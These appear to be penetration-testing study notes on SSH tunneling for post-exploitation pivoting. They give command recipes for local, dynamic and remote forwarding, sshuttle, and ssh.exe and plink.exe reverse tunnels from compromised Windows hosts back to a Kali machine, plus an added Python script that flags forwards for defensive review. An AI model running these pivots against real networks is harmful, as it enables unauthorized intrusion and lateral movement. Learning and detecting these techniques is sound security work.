# SSH Tunneling

## Local Port Forwarding

| System             | IP address     |
| ------------------ | -------------- |
| LHOST              | 192.168.50.10  |
| APPLICATION SERVER | 192.168.100.10 |
| DATABASE SERVER    | 10.10.100.20   |
| WINDOWS HOST       | 172.16.50.10   |

* LHOST > APPLICATION SERVER > DATABASE SERVER > WINDOWS HOST

![](https://github.com/marcgoam/M4RCG04M-blog/blob/main/notes/post-explotation/imgs/Pasted%20image%2020250726112550.png)

**Application Server**

```
ssh -N -L 0.0.0.0:4455:172.16.50.10:445 <USERNAME>@10.10.100.20
```

**Kali**

```
smbclient -p 4455 //192.168.100.10/<SHARE> -U <USERNAME>
```

## Dynamic Port Forwarding

![](https://github.com/marcgoam/M4RCG04M-blog/blob/main/notes/post-explotation/imgs/Pasted%20image%2020250726120154.png)

**Application Server**

```
ssh -N -D 0.0.0.0:9999 <USERNAME>@10.10.100.20
```

**Kali**

Edit the /etc/proxychains4.conf file

```/etc/proxychains4.conf
socks5 192.168.100.10 9999
```

Test the connection

```
sudo proxychains smbclient //172.16.50.10/<SHARE> -U <USERNAME> --password=<PASSWORD>
```

## Remote Port Forwarding

![](https://github.com/marcgoam/M4RCG04M-blog/blob/main/notes/post-explotation/imgs/Pasted%20image%2020250726124642.png)

**Kali**

```
sudo systemctl start ssh
sudo ss -tulpn
```

**Application Server**

```
ssh -N -R 127.0.0.1:2345:10.10.100.20:5432 <USERNAME>@192.168.50.10
```

**Kali**

```
psql -h 127.0.0.1 -p 2345 -U postgres
```

## Remote Dynamic Port Forwarding

![](https://github.com/marcgoam/M4RCG04M-blog/blob/main/notes/post-explotation/imgs/Pasted%20image%2020250726154332.png)

**Application Server**

```
ssh -N -R 9998 <USERNAME>@192.168.50.10
```

**Kali**

Edit the /etc/proxychains4.conf file

```/etc/proxychains4.conf
socks5 127.0.0.1 9998
```

Test the connection

```
sudo proxychains nmap -vvv -sT --top-ports=20 -Pn -n 10.10.100.20
```
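For reviewing these four forwarding modes from process listings or audit logs, the sketch below parses an `ssh` command line and reports each forward's mode, which side opens the listener, and whether it is bound to all interfaces. It is an added example, not part of the original notes; the `TAKES_ARG` option set is an assumption to check against `ssh(1)` for your client version, and the sample command lines are constructed from the commands above.

```python
import re
import shlex

# ssh client options that consume an argument (assumed set; check ssh(1) for your version).
TAKES_ARG = set("BbcDEeFIiJLlmOoPpQRSWw")
WILDCARD = {"0.0.0.0", "*", "::", "[::]", ""}  # binds reachable from other hosts
SPEC_SPLIT = re.compile(r":(?![^\[]*\])")      # ':' outside [IPv6] brackets

# Constructed sample process command lines, modelled on the commands on this page.
SAMPLES = [
    "ssh -N -L 0.0.0.0:4455:172.16.50.10:445 user@10.10.100.20",
    "ssh -N -D 0.0.0.0:9999 user@10.10.100.20",
    "ssh -N -R 127.0.0.1:2345:10.10.100.20:5432 user@192.168.50.10",
    "ssh -N -R 9998 user@192.168.50.10",
]

def describe(flag, parts):
    """Turn one -L/-D/-R spec into a finding a reviewer can triage."""
    dynamic = flag == "D" or (flag == "R" and len(parts) <= 2)
    has_bind = len(parts) == (2 if dynamic else 4)
    bind = parts[0] if has_bind else None  # None: ssh default, loopback only
    rest = parts[1:] if has_bind else parts
    mode = {"L": "local", "D": "dynamic", "R": "remote"}[flag]
    return {"mode": mode + ("-dynamic" if flag == "R" and dynamic else ""),
            "listener_on": "ssh client" if flag in "LD" else "ssh server",
            "bind": bind, "port": rest[0],
            "target": None if dynamic else ":".join(rest[1:]),
            "all_interfaces": bind in WILDCARD}

def classify(cmdline):
    """Return one finding per -L/-D/-R forward in an ssh command line."""
    argv, found, i = shlex.split(cmdline), [], 1
    while i < len(argv):
        arg, i = argv[i], i + 1
        if not arg.startswith("-"):
            continue
        for pos, flag in enumerate(arg[1:], start=1):
            if flag in TAKES_ARG:
                value = arg[pos + 1:]
                if not value and i < len(argv):
                    value, i = argv[i], i + 1
                if flag in "LDR":
                    found.append(describe(flag, SPEC_SPLIT.split(value)))
                break  # the rest of this argument was the option's value
    return found

if __name__ == "__main__":
    for line in SAMPLES:
        print(line, "->", classify(line))
```

A `-R` bind address is a request to the SSH server, which applies it only as far as its `GatewayPorts` setting allows, so `all_interfaces` on a remote forward describes what was asked for rather than what is listening.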

## Using sshuttle

**Application Server**

```
socat TCP-LISTEN:2222,fork TCP:10.10.100.20:22
```

**Kali**

```
sshuttle -r <USERNAME>@192.168.100.10:2222 10.10.100.0/24 172.16.50.0/24
smbclient -L //172.16.50.10/ -U <USERNAME> --password=<PASSWORD>
```

## ssh.exe

**Kali**

```
sudo systemctl start ssh
xfreerdp /u:<user> /p:<pass> /v:<ip>
```

**Windows Machine**

```
where ssh
ssh -N -R 9998 kali@<ip_kali>
```

**Kali**

```
ss -ntplu
```

```/etc/proxychains4.conf
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 127.0.0.1 9998
```

```
proxychains psql -h 10.4.50.215 -U postgres
```

## plink.exe

**Kali**

Locate plink.exe and upload it to the Windows machine

```shell
find / -name plink.exe 2>/dev/null
/usr/share/windows-resources/binaries/plink.exe
```

**Windows Machine**

```batchfile
plink.exe -ssh -l <USERNAME> -pw <PASSWORD> -R 127.0.0.1:9833:127.0.0.1:3389 <kali_ip>
```

**Kali**

```shell
ss -tulpn
xfreerdp3 /u:<USERNAME> /p:<PASSWORD> /v:127.0.0.1:9833
```
